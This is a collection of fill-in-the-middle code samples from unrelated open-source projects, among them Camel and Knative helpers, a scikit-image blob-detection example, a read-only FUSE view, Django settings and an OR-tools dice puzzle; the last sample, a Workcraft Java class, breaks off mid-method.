<|file_name|>DefaultValidatorRegistry.java<|end_file_name|><|fim▁begin|>/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.impl.engine; import org.apache.camel.CamelContext; import org.apache.camel.spi.DataType; import org.apache.camel.spi.Validator; import org.apache.camel.spi.ValidatorRegistry; import org.apache.camel.support.CamelContextHelper; import org.apache.camel.support.service.ServiceHelper; import org.apache.camel.util.ObjectHelper; /** * Default implementation of {@link org.apache.camel.spi.ValidatorRegistry}. */ public class DefaultValidatorRegistry extends AbstractDynamicRegistry<ValidatorKey, Validator> implements ValidatorRegistry<ValidatorKey> { public DefaultValidatorRegistry(CamelContext context) { super(context, CamelContextHelper.getMaximumValidatorCacheSize(context)); } @Override public Validator resolveValidator(ValidatorKey key) { Validator answer = get(key); if (answer == null && ObjectHelper.isNotEmpty(key.getType().getName())) { answer = get(new ValidatorKey(new DataType(key.getType().getModel()))); } return answer; } @Override public boolean isStatic(DataType type) { return isStatic(new ValidatorKey(type)); } <|fim▁hole|> @Override public String toString() { return "ValidatorRegistry for " + context.getName() + " [capacity: " + maxCacheSize + "]"; } @Override public Validator put(ValidatorKey key, Validator obj) { // ensure validator is started before its being used ServiceHelper.startService(obj); return super.put(key, obj); } }<|fim▁end|>
@Override public boolean isDynamic(DataType type) { return isDynamic(new ValidatorKey(type)); }
<|file_name|>listers.go<|end_file_name|><|fim▁begin|>/* Copyright 2018 The Knative Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package testing import ( appsv1 "k8s.io/api/apps/v1" corev1 "k8s.io/api/core/v1" rbacv1 "k8s.io/api/rbac/v1" apiextensionsv1 "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1" fakeapiextensionsclientset "k8s.io/apiextensions-apiserver/pkg/client/clientset/clientset/fake" apiextensionsv1listers "k8s.io/apiextensions-apiserver/pkg/client/listers/apiextensions/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime" "k8s.io/apimachinery/pkg/runtime/schema" fakekubeclientset "k8s.io/client-go/kubernetes/fake" appsv1listers "k8s.io/client-go/listers/apps/v1" corev1listers "k8s.io/client-go/listers/core/v1" rbacv1listers "k8s.io/client-go/listers/rbac/v1" "k8s.io/client-go/tools/cache" sourcesv1beta2 "knative.dev/eventing/pkg/apis/sources/v1beta2" fakeeventingclientset "knative.dev/eventing/pkg/client/clientset/versioned/fake" sourcev1beta2listers "knative.dev/eventing/pkg/client/listers/sources/v1beta2" duckv1 "knative.dev/pkg/apis/duck/v1" "knative.dev/pkg/reconciler/testing" ) var subscriberAddToScheme = func(scheme *runtime.Scheme) error { scheme.AddKnownTypeWithName(schema.GroupVersionKind{Group: "testing.eventing.knative.dev", Version: "v1", Kind: "Subscriber"}, &unstructured.Unstructured{}) return nil } var sourceAddToScheme = func(scheme *runtime.Scheme) error { scheme.AddKnownTypeWithName(schema.GroupVersionKind{Group: "testing.sources.knative.dev", Version: "v1", Kind: "TestSource"}, &duckv1.Source{}) return nil } var clientSetSchemes = []func(*runtime.Scheme) error{ fakekubeclientset.AddToScheme, fakeeventingclientset.AddToScheme, fakeapiextensionsclientset.AddToScheme, subscriberAddToScheme, sourceAddToScheme, } type Listers struct { sorter testing.ObjectSorter } func NewScheme() *runtime.Scheme { scheme := runtime.NewScheme() for _, addTo := range clientSetSchemes { addTo(scheme) } return scheme } func NewListers(objs []runtime.Object) Listers { scheme := runtime.NewScheme() for _, addTo := range clientSetSchemes { addTo(scheme) } ls := Listers{ sorter: testing.NewObjectSorter(scheme), } ls.sorter.AddObjects(objs...) return ls } func (l *Listers) indexerFor(obj runtime.Object) cache.Indexer { return l.sorter.IndexerForObjectType(obj) } func (l *Listers) GetKubeObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakekubeclientset.AddToScheme) } func (l *Listers) GetEventingObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakeeventingclientset.AddToScheme) } func (l *Listers) GetAPIExtentionsObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakeapiextensionsclientset.AddToScheme) } func (l *Listers) GetSubscriberObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(subscriberAddToScheme) } func (l *Listers) GetAllObjects() []runtime.Object { all := l.GetSubscriberObjects() all = append(all, l.GetEventingObjects()...) all = append(all, l.GetKubeObjects()...) 
return all } func (l *Listers) GetPingSourceV1beta2Lister() sourcev1beta2listers.PingSourceLister { return sourcev1beta2listers.NewPingSourceLister(l.indexerFor(&sourcesv1beta2.PingSource{})) } func (l *Listers) GetDeploymentLister() appsv1listers.DeploymentLister { return appsv1listers.NewDeploymentLister(l.indexerFor(&appsv1.Deployment{})) } func (l *Listers) GetK8sServiceLister() corev1listers.ServiceLister { return corev1listers.NewServiceLister(l.indexerFor(&corev1.Service{})) } func (l *Listers) GetSecretLister() corev1listers.SecretLister { return corev1listers.NewSecretLister(l.indexerFor(&corev1.Secret{})) } func (l *Listers) GetNamespaceLister() corev1listers.NamespaceLister { return corev1listers.NewNamespaceLister(l.indexerFor(&corev1.Namespace{})) } func (l *Listers) GetServiceAccountLister() corev1listers.ServiceAccountLister { return corev1listers.NewServiceAccountLister(l.indexerFor(&corev1.ServiceAccount{})) } func (l *Listers) GetServiceLister() corev1listers.ServiceLister {<|fim▁hole|> return corev1listers.NewServiceLister(l.indexerFor(&corev1.Service{})) } func (l *Listers) GetRoleBindingLister() rbacv1listers.RoleBindingLister { return rbacv1listers.NewRoleBindingLister(l.indexerFor(&rbacv1.RoleBinding{})) } func (l *Listers) GetEndpointsLister() corev1listers.EndpointsLister { return corev1listers.NewEndpointsLister(l.indexerFor(&corev1.Endpoints{})) } func (l *Listers) GetConfigMapLister() corev1listers.ConfigMapLister { return corev1listers.NewConfigMapLister(l.indexerFor(&corev1.ConfigMap{})) } func (l *Listers) GetCustomResourceDefinitionLister() apiextensionsv1listers.CustomResourceDefinitionLister { return apiextensionsv1listers.NewCustomResourceDefinitionLister(l.indexerFor(&apiextensionsv1.CustomResourceDefinition{})) }<|fim▁end|>
<|file_name|>plot_blob.py<|end_file_name|><|fim▁begin|>""" ============== Blob Detection ============== Blobs are bright on dark or dark on bright regions in an image. In this example, blobs are detected using 3 algorithms. The image used in this case is the Hubble eXtreme Deep Field. Each bright dot in the image is a star or a galaxy. Laplacian of Gaussian (LoG) ----------------------------- This is the most accurate and slowest approach. It computes the Laplacian of Gaussian images with successively increasing standard deviation and stacks them up in a cube. Blobs are local maximas in this cube. Detecting larger blobs is especially slower because of larger kernel sizes during convolution. Only bright blobs on dark backgrounds are detected. See :py:meth:`skimage.feature.blob_log` for usage. Difference of Gaussian (DoG) ---------------------------- This is a faster approximation of LoG approach. In this case the image is blurred with increasing standard deviations and the difference between two successively blurred images are stacked up in a cube. This method suffers from the same disadvantage as LoG approach for detecting larger blobs. Blobs are again assumed to be bright on dark. See :py:meth:`skimage.feature.blob_dog` for usage. Determinant of Hessian (DoH) ---------------------------- This is the fastest approach. It detects blobs by finding maximas in the matrix of the Determinant of Hessian of the image. The detection speed is independent of the size of blobs as internally the implementation uses box filters instead of convolutions. Bright on dark as well as dark on bright blobs are detected. The downside is that small blobs (<3px) are not detected accurately. See :py:meth:`skimage.feature.blob_doh` for usage. """ from math import sqrt from skimage import data from skimage.feature import blob_dog, blob_log, blob_doh from skimage.color import rgb2gray import matplotlib.pyplot as plt image = data.hubble_deep_field()[0:500, 0:500] image_gray = rgb2gray(image) blobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1) # Compute radii in the 3rd column. blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2) blobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1) blobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2) blobs_doh = blob_doh(image_gray, max_sigma=30, threshold=.01)<|fim▁hole|> 'Determinant of Hessian'] sequence = zip(blobs_list, colors, titles) fig, axes = plt.subplots(1, 3, figsize=(9, 3), sharex=True, sharey=True, subplot_kw={'adjustable': 'box-forced'}) ax = axes.ravel() for idx, (blobs, color, title) in enumerate(sequence): ax[idx].set_title(title) ax[idx].imshow(image, interpolation='nearest') for blob in blobs: y, x, r = blob c = plt.Circle((x, y), r, color=color, linewidth=2, fill=False) ax[idx].add_patch(c) ax[idx].set_axis_off() plt.tight_layout() plt.show()<|fim▁end|>
blobs_list = [blobs_log, blobs_dog, blobs_doh] colors = ['yellow', 'lime', 'red'] titles = ['Laplacian of Gaussian', 'Difference of Gaussian',
<|file_name|>load_more.py<|end_file_name|><|fim▁begin|>def action_comment_load_more(context, action, entity_type, entity_id, last_id, parent_id, **args): try: entity = IN.entitier.load_single(entity_type, int(entity_id)) if not entity: return output = Object() db = IN.db connection = db.connection container_id = IN.commenter.get_container_id(entity) # TODO: paging # get total total = 0 limit = 10 cursor = db.select({ 'table' : 'entity.comment', 'columns' : ['count(id)'], 'where' : [ ['container_id', container_id], ['id', '<', int(last_id)], # load previous ['parent_id', parent_id], ['status', 1], ], }).execute() if cursor.rowcount >= 0: total = int(cursor.fetchone()[0]) more_id = '_'.join(('more-commens', entity_type, str(entity_id), str(parent_id))) if total > 0: cursor = db.select({ 'table' : 'entity.comment', 'columns' : ['id'], 'where' : [ ['container_id', container_id], ['id', '<', int(last_id)], ['parent_id', parent_id], # add main level comments only ['status', 1], ], 'order' : {'created' : 'DESC'}, 'limit' : limit, }).execute() ids = [] last_id = 0 if cursor.rowcount >= 0: for row in cursor: ids.append(row['id']) last_id = ids[-1] # last id comments = IN.entitier.load_multiple('Comment', ids) for id, comment in comments.items(): comment.weight = id # keep asc order output.add(comment) remaining = total - limit if remaining > 0 and last_id > 0: output.add('TextDiv', { 'id' : more_id, 'value' : str(remaining) + ' more comments', 'css' : ['ajax i-text-center i-text-danger pointer'], 'attributes' : { 'data-href' : ''.join(('/comment/more/!Content/', str(entity_id), '/', str(last_id), '/', str(parent_id))) }, 'weight' : -1, }) #if not output:<|fim▁hole|> #output.add(type = 'TextDiv', data = {}) output = {more_id : output} context.response = In.core.response.PartialResponse(output = output) except: IN.logger.debug()<|fim▁end|>
<|file_name|>read_only.py<|end_file_name|><|fim▁begin|># Copyright 2014 PressLabs SRL # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from errno import EROFS from fuse import FuseOSError, ENOTSUP from .view import View class ReadOnlyView(View): def getxattr(self, path, name, *args): raise FuseOSError(ENOTSUP) def open(self, path, flags): write_flags = (os.O_WRONLY | os.O_RDWR | os.O_APPEND | os.O_TRUNC | os.O_CREAT) if write_flags & flags: raise FuseOSError(EROFS) return 0 def create(self, path, fh): raise FuseOSError(EROFS) def write(self, path, fh): raise FuseOSError(EROFS)<|fim▁hole|> def opendir(self, path): return 0 def releasedir(self, path, fi): return 0 def flush(self, path, fh): return 0 def release(self, path, fh): return 0 def access(self, path, amode): if amode & os.W_OK: raise FuseOSError(EROFS) return 0 def mkdir(self, path, mode): raise FuseOSError(EROFS) def utimens(self, path, times=None): raise FuseOSError(EROFS) def chown(self, path, uid, gid): raise FuseOSError(EROFS) def chmod(self, path, mode): raise FuseOSError(EROFS)<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
"""Must be kept even empty. That makes a Django app."""
<|file_name|>ex13.py<|end_file_name|><|fim▁begin|>#### #Importing modules can serve 3 purposes if done right #1-Allows you to add features to bare bones python #2-Only importing what you need lets your imports serve as documentation for # someone else reading your code later. #3-By forcing you to import things, python helps you keep your programs small #### #import the 'hook' which lets python read command line arguments from sys import argv #argv is a list. This line puts all the elements into variables script, first, second, third, fourth = argv #You understand printing by now print "Your script is called ", script, ", which was the zeroth variable." print "Your first variable was ", first print "Your second variable was ", second<|fim▁hole|><|fim▁end|>
print "Your third variable was ", third print "Your first variable was ", first
<|file_name|>SqlDataType.java<|end_file_name|><|fim▁begin|>/* Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.google.swarm.sqlserver.migration.common; import java.util.HashMap;<|fim▁hole|> VARCHAR(0), NVARCHAR(1), CHAR(2), NCHAR(3), TEXT(4), NTEXT(5), BIGINT(6), INT(7), TINYINT(8), SMALLINT(9), NUMERIC(10), DECIMAL(11), MONEY(12), SMALLMONEY(13), FLOAT(14), REAL(15), BIT(16), DATE(17), TIME(18), DATETIME(19), DATETIME2(20), DATETIMEOFFSET(21), SMALLDATETIME(22), BINARY(23), IMAGE(24), VARBINARY(25), UNIQUEIDENTIFIER(26), TIMESTAMP(27); private int codeValue; private static HashMap<Integer, SqlDataType> codeValueMap = new HashMap<Integer, SqlDataType>(); private SqlDataType(int codeValue) { this.codeValue = codeValue; } static { for (SqlDataType type : SqlDataType.values()) { codeValueMap.put(type.codeValue, type); } } public static SqlDataType getInstanceFromCodeValue(int codeValue) { return codeValueMap.get(codeValue); } public int getCodeValue() { return codeValue; } }<|fim▁end|>
public enum SqlDataType {
<|file_name|>user_config.py<|end_file_name|><|fim▁begin|>from cobra.core.loading import get_model from cobra.core import json class UserConfig(object): default_config = { 'guide.task.participant': '1',<|fim▁hole|> 'order.task.search': 'default', 'order.task.searchDirection': 'DESC', 'portal.workdyna': 'subordinates-task', 'system.menu.display':'', 'viewState.task': 'list', 'guide.biaoge.showintro': '1', 'workreport.push.set': '1', 'agenda.push.set': '1' } def __init__(self, user): self.__user_config = self.__build_user_config(user) def __build_user_config(self, user): UserOption = get_model('option', 'UserOption') u_c = {} for k, v in self.default_config.items(): u_c[k] = UserOption.objects.get_value(user, None, k, v) return u_c def to_python(self): configs = [] for k, v in self.__user_config.items(): m = { 'configKey': k, 'configValue': v } configs.append(m) return configs def to_json(self): return json.dumps(self.to_python())<|fim▁end|>
'guide.document.share': '1', 'guide.customer.share': '1', 'guide.workflow.operation': '1', 'guide.workflow.createform': '1',
<|file_name|>nontransitive_dice.py<|end_file_name|><|fim▁begin|># Copyright 2010 Hakan Kjellerstrand [email protected] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Nontransitive dice in Google CP Solver. From http://en.wikipedia.org/wiki/Nontransitive_dice ''' A set of nontransitive dice is a set of dice for which the relation 'is more likely to roll a higher number' is not transitive. See also intransitivity. This situation is similar to that in the game Rock, Paper, Scissors, in which each element has an advantage over one choice and a disadvantage to the other. ''' I start with the 3 dice version ''' * die A has sides {2,2,4,4,9,9}, * die B has sides {1,1,6,6,8,8}, and * die C has sides {3,3,5,5,7,7}. ''' 3 dice: Maximum winning: 27 comp: [19, 27, 19] dice: [[0, 0, 3, 6, 6, 6], [2, 5, 5, 5, 5, 5], [1, 1, 4, 4, 4, 7]] max_win: 27 Number of solutions: 1 Nodes: 1649873 Time: 25.94 getFailures: 1649853 getBacktracks: 1649873 getPropags: 98105090 Max winnings where they are the same: 21 comp: [21, 21, 21] dice: [[0, 0, 3, 3, 3, 6], [2, 2, 2, 2, 2, 5], [1, 1, 1, 4, 4, 4]] max_win: 21 Compare with these models: * MiniZinc: http://hakank.org/minizinc/nontransitive_dice.mzn * Comet: http://hakank.org/comet/nontransitive_dice.co This model was created by Hakan Kjellerstrand ([email protected]) Also see my other Google CP Solver models: http://www.hakank.org/google_or_tools/ """ import sys import string from ortools.constraint_solver import pywrapcp def main(m=3, n=6, minimize_val=0): # Create the solver. solver = pywrapcp.Solver("Nontransitive dice") # # data # print "number of dice:", m print "number of sides:", n # # declare variables # dice = {} for i in range(m): for j in range(n): dice[(i, j)] = solver.IntVar(1, n * 2, "dice(%i,%i)" % (i, j)) dice_flat = [dice[(i, j)] for i in range(m) for j in range(n)] comp = {} for i in range(m): for j in range(2): comp[(i, j)] = solver.IntVar(0, n * n, "comp(%i,%i)" % (i, j)) comp_flat = [comp[(i, j)] for i in range(m) for j in range(2)] # The following variables are for summaries or objectives gap = [solver.IntVar(0, n * n, "gap(%i)" % i) for i in range(m)]<|fim▁hole|> max_val = solver.IntVar(0, n * 2, "max_val") max_win = solver.IntVar(0, n * n, "max_win") # number of occurrences of each value of the dice counts = [solver.IntVar(0, n * m, "counts(%i)" % i) for i in range(n * 2 + 1)] # # constraints # # number of occurrences for each number solver.Add(solver.Distribute(dice_flat, range(n * 2 + 1), counts)) solver.Add(max_win == solver.Max(comp_flat)) solver.Add(max_val == solver.Max(dice_flat)) # order of the number of each die, lowest first [solver.Add(dice[(i, j)] <= dice[(i, j + 1)]) for i in range(m) for j in range(n - 1)] # nontransitivity [comp[i, 0] > comp[i, 1] for i in range(m)], # probability gap [solver.Add(gap[i] == comp[i, 0] - comp[i, 1]) for i in range(m)] [solver.Add(gap[i] > 0) for i in range(m)] solver.Add(gap_sum == solver.Sum(gap)) # and now we roll... 
# Number of wins for [A vs B, B vs A] for d in range(m): b1 = [solver.IsGreaterVar(dice[d % m, r1], dice[(d + 1) % m, r2]) for r1 in range(n) for r2 in range(n)] solver.Add(comp[d % m, 0] == solver.Sum(b1)) b2 = [solver.IsGreaterVar(dice[(d + 1) % m, r1], dice[d % m, r2]) for r1 in range(n) for r2 in range(n)] solver.Add(comp[d % m, 1] == solver.Sum(b2)) # objective if minimize_val != 0: print "Minimizing max_val" objective = solver.Minimize(max_val, 1) # other experiments # objective = solver.Maximize(max_win, 1) # objective = solver.Maximize(gap_sum, 1) # # solution and search # db = solver.Phase(dice_flat + comp_flat, solver.INT_VAR_DEFAULT, solver.ASSIGN_MIN_VALUE) if minimize_val: solver.NewSearch(db, [objective]) else: solver.NewSearch(db) num_solutions = 0 while solver.NextSolution(): print "gap_sum:", gap_sum.Value() print "gap:", [gap[i].Value() for i in range(m)] print "max_val:", max_val.Value() print "max_win:", max_win.Value() print "dice:" for i in range(m): for j in range(n): print dice[(i, j)].Value(), print print "comp:" for i in range(m): for j in range(2): print comp[(i, j)].Value(), print print "counts:", [counts[i].Value() for i in range(n * 2 + 1)] print num_solutions += 1 solver.EndSearch() print print "num_solutions:", num_solutions print "failures:", solver.Failures() print "branches:", solver.Branches() print "WallTime:", solver.WallTime() m = 3 # number of dice n = 6 # number of sides of each die minimize_val = 0 # Minimizing max value (0: no, 1: yes) if __name__ == "__main__": if len(sys.argv) > 1: m = string.atoi(sys.argv[1]) if len(sys.argv) > 2: n = string.atoi(sys.argv[2]) if len(sys.argv) > 3: minimize_val = string.atoi(sys.argv[3]) main(m, n, minimize_val)<|fim▁end|>
gap_sum = solver.IntVar(0, m * n * n, "gap_sum")
<|file_name|>base.py<|end_file_name|><|fim▁begin|>import os from unipath import Path from django.core.exceptions import ImproperlyConfigured import dj_database_url def env_var(var_name): """Get the environment variable var_name or return an exception.""" try: return os.environ[var_name] except KeyError: msg = "Please set the environment variable {}".format(var_name) raise ImproperlyConfigured(msg) SECRET_KEY = env_var("MT_SECRET_KEY") ALLOWED_HOSTS = ['localhost', '127.0.0.1'] # ADMIN_PATH controls where the admin urls are. # e.g. if ADMIN_PATH == 'adminsitemilktea', then the admin site # should be available at /adminsitemilktea/ instead of /admin/. ADMIN_PATH = env_var("MT_ADMIN_PATH") DJANGO_CORE_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] THIRD_PARTY_APPS = [ 'djmoney', 'nested_admin', ] CUSTOM_APPS = [ 'core', ] INSTALLED_APPS = DJANGO_CORE_APPS + THIRD_PARTY_APPS + CUSTOM_APPS MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'mt.urls' WSGI_APPLICATION = 'mt.wsgi.application' BASE_DIR = Path(__file__).ancestor(3) MEDIA_ROOT = BASE_DIR.child("media") STATIC_ROOT = BASE_DIR.child("static") STATICFILES_DIRS = ( BASE_DIR.child("assets"), ) TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': (BASE_DIR.child("templates"),), 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] DATABASES = {'default': dj_database_url.parse(env_var("MT_MYSQL_URL"), conn_max_age = 600)}<|fim▁hole|>AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] TIME_ZONE = 'America/Los_Angeles' LANGUAGE_CODE = 'en-us' USE_I18N = False USE_L10N = True USE_TZ = True STATIC_URL = '/static/'<|fim▁end|>
DATABASES['default']['ATOMIC_REQUESTS'] = True
<|file_name|>VisualFunctionContact.java<|end_file_name|><|fim▁begin|>package org.workcraft.plugins.circuit; import org.workcraft.annotations.DisplayName; import org.workcraft.annotations.Hotkey; import org.workcraft.annotations.SVGIcon; import org.workcraft.dom.Node; import org.workcraft.dom.visual.BoundingBoxHelper; import org.workcraft.dom.visual.DrawRequest; import org.workcraft.formula.BooleanFormula; import org.workcraft.formula.visitors.FormulaRenderingResult; import org.workcraft.formula.visitors.FormulaToGraphics; import org.workcraft.gui.tools.Decoration; import org.workcraft.observation.PropertyChangedEvent; import org.workcraft.observation.StateEvent; import org.workcraft.observation.StateObserver; import org.workcraft.plugins.circuit.renderers.ComponentRenderingResult.RenderType; import org.workcraft.serialisation.NoAutoSerialisation; import org.workcraft.utils.ColorUtils; import org.workcraft.utils.Hierarchy; import java.awt.*; import java.awt.event.KeyEvent; import java.awt.font.FontRenderContext; import java.awt.geom.*; import java.io.IOException; import java.util.Collection; import java.util.HashSet;<|fim▁hole|>@Hotkey(KeyEvent.VK_P) @SVGIcon("images/circuit-node-port.svg") public class VisualFunctionContact extends VisualContact implements StateObserver { private static final double size = 0.3; private static FontRenderContext context = new FontRenderContext(AffineTransform.getScaleInstance(1000.0, 1000.0), true, true); private static Font functionFont; private FormulaRenderingResult renderedSetFunction = null; private FormulaRenderingResult renderedResetFunction = null; private static double functionFontSize = CircuitSettings.getFunctionFontSize(); static { try { functionFont = Font.createFont(Font.TYPE1_FONT, ClassLoader.getSystemResourceAsStream("fonts/eurm10.pfb")); } catch (FontFormatException | IOException e) { e.printStackTrace(); } } public VisualFunctionContact(FunctionContact contact) { super(contact); } @Override public FunctionContact getReferencedComponent() { return (FunctionContact) super.getReferencedComponent(); } @NoAutoSerialisation public BooleanFormula getSetFunction() { return getReferencedComponent().getSetFunction(); } @NoAutoSerialisation public void setSetFunction(BooleanFormula setFunction) { if (getParent() instanceof VisualFunctionComponent) { VisualFunctionComponent p = (VisualFunctionComponent) getParent(); p.invalidateRenderingResult(); } renderedSetFunction = null; getReferencedComponent().setSetFunction(setFunction); } @NoAutoSerialisation public BooleanFormula getResetFunction() { return getReferencedComponent().getResetFunction(); } @NoAutoSerialisation public void setForcedInit(boolean value) { getReferencedComponent().setForcedInit(value); } @NoAutoSerialisation public boolean getForcedInit() { return getReferencedComponent().getForcedInit(); } @NoAutoSerialisation public void setInitToOne(boolean value) { getReferencedComponent().setInitToOne(value); } @NoAutoSerialisation public boolean getInitToOne() { return getReferencedComponent().getInitToOne(); } @NoAutoSerialisation public void setResetFunction(BooleanFormula resetFunction) { if (getParent() instanceof VisualFunctionComponent) { VisualFunctionComponent p = (VisualFunctionComponent) getParent(); p.invalidateRenderingResult(); } renderedResetFunction = null; getReferencedComponent().setResetFunction(resetFunction); } public void invalidateRenderedFormula() { renderedSetFunction = null; renderedResetFunction = null; } private Font getFunctionFont() { return 
functionFont.deriveFont((float) CircuitSettings.getFunctionFontSize()); } private FormulaRenderingResult getRenderedSetFunction() { if (Math.abs(CircuitSettings.getFunctionFontSize() - functionFontSize) > 0.001) { functionFontSize = CircuitSettings.getContactFontSize(); renderedSetFunction = null; } BooleanFormula setFunction = getReferencedComponent().getSetFunction(); if (setFunction == null) { renderedSetFunction = null; } else if (renderedSetFunction == null) { renderedSetFunction = FormulaToGraphics.render(setFunction, context, getFunctionFont()); } return renderedSetFunction; } private Point2D getSetFormulaOffset() { double xOffset = size; double yOffset = -size / 2; FormulaRenderingResult renderingResult = getRenderedSetFunction(); if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { xOffset = -(size + renderingResult.boundingBox.getWidth()); } } return new Point2D.Double(xOffset, yOffset); } private Rectangle2D getSetBoundingBox() { Rectangle2D bb = null; FormulaRenderingResult setRenderingResult = getRenderedSetFunction(); if (setRenderingResult != null) { bb = BoundingBoxHelper.move(setRenderingResult.boundingBox, getSetFormulaOffset()); Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); bb = BoundingBoxHelper.transform(bb, rotateTransform); } } return bb; } private FormulaRenderingResult getRenderedResetFunction() { if (Math.abs(CircuitSettings.getFunctionFontSize() - functionFontSize) > 0.001) { functionFontSize = CircuitSettings.getContactFontSize(); renderedResetFunction = null; } BooleanFormula resetFunction = getReferencedComponent().getResetFunction(); if (resetFunction == null) { renderedResetFunction = null; } else if (renderedResetFunction == null) { renderedResetFunction = FormulaToGraphics.render(resetFunction, context, getFunctionFont()); } return renderedResetFunction; } private Point2D getResetFormulaOffset() { double xOffset = size; double yOffset = size / 2; FormulaRenderingResult renderingResult = getRenderedResetFunction(); if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { xOffset = -(size + renderingResult.boundingBox.getWidth()); } yOffset = size / 2 + renderingResult.boundingBox.getHeight(); } return new Point2D.Double(xOffset, yOffset); } private Rectangle2D getResetBoundingBox() { Rectangle2D bb = null; FormulaRenderingResult renderingResult = getRenderedResetFunction(); if (renderingResult != null) { bb = BoundingBoxHelper.move(renderingResult.boundingBox, getResetFormulaOffset()); Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); bb = BoundingBoxHelper.transform(bb, rotateTransform); } } return bb; } private void drawArrow(Graphics2D g, int arrowType, double arrX, double arrY) { double s = CircuitSettings.getFunctionFontSize(); g.setStroke(new BasicStroke((float) s / 25)); double s1 = 0.75 * s; double s2 = 0.45 * s; double s3 = 0.30 * s; if 
